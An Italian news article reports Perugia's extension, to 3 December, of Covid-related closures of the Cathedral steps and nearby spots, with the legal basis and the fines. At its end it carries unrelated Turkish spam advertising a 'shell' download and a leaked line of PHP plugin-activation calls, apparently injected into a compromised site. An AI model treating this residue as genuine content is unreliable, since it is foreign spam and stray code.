Mini zone rosse e transenne prorogate fino al 3 dicembre nel centro storico di Perugia: ecco perché



Pugno duro del Comune di Perugia contro gli assembramenti in centro. Le mini zone rosse tra Piazza IV Novembre e Piazza Danti sono state prorogate fino al 3 dicembre. L’ordinanza è stata firmata sabato 21 novembre dal sindaco, Andrea Romizi. Viene stabilita la “la chiusura al pubblico, per l’intero arco della giornata, fino al 3 dicembre delle aree di seguito indicate: la scalinata della Cattedrale di San Lorenzo, sia nella parte che si affaccia su Piazza IV Novembre, che su quella che si affaccia su Piazza Danti, lasciando libero accesso alla Cattedrale, le Logge di Braccio e la scalinata di Palazzo dei Priori, lasciando libero accesso alla Sala dei Notari ed alla Sala della Vaccara”. Le transenne sono già state montate in occasione della prima ordinanza, emessa il 12 novembre. Nel nuovo atto si certifica che “permane l’esigenza di vietare l’utilizzo delle predette aree secondo le medesime modalità”. La violazione dell’ordinanza comporta una sanzione che va dai 400 ai mille euro.Il sindaco si è avvalso dei poteri di due distinti Dpcm emessi per arginare la pandemia. Il primo del 16 maggio scorso che dà al primo cittadino la facoltà di “disporre la chiusura temporanea di specifiche aree pubbliche o aperte al pubblico in cui sia impossibile assicurare adeguatamente il rispetto della distanza di sicurezza interpersonale di almeno un metro”. Poi c’è il decreto del 3 novembre. Che testualmente recita: “Delle strade o piazze nei centri urbani, dove si possono creare situazioni di assembramento, può essere disposta per tutta la giornata o in determinate fasce orarie la chiusura al pubblico, fatta salva la possibilità di accesso, e deflusso, agli esercizi commerciali legittimamente aperti e alle abitazioni private”. La scelta è motivata con le infrazioni delle norme anti covid registrate tra la fine di ottobre e gli inizi di novembre. “Nei giorni scorsi”, è scritto nell’istruttoria del primo atto, “si è registrata la presenza di molte persone nell’area del centro storico, nonostante i recenti divieti imposti per fronteggiare l’emergenza coronavirus, con conseguente fenomeno di intensa aggregazione sociale e di ritrovo nelle aree pubbliche ed in quelle aperte all’uso pubblico”, è scritto nell’ordinanza. Nelle aree transennate “è stato appurato che sono soliti aggregarsi gruppi di giovani, con rischio di contagio da Covid-19, per il venir meno della misura del distanziamento”. La decisione della proroga è stata presa in accordo con il comitato per l’ordine e la sicurezza pubblica coordinato dalla prefettura di Perugia. Intanto vanno avanti in controlli delle forze dell’ordine e della polizia locale. Il comando dei vigili fa sapere che negli ultimi due giorni sono state controllate 42 autocertificazioni ed è stato elevato un verbale per violazione delle norme Covid in quanto “il soggetto era fuori comune senza giustificato motivo”. Multa da 400 euro.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );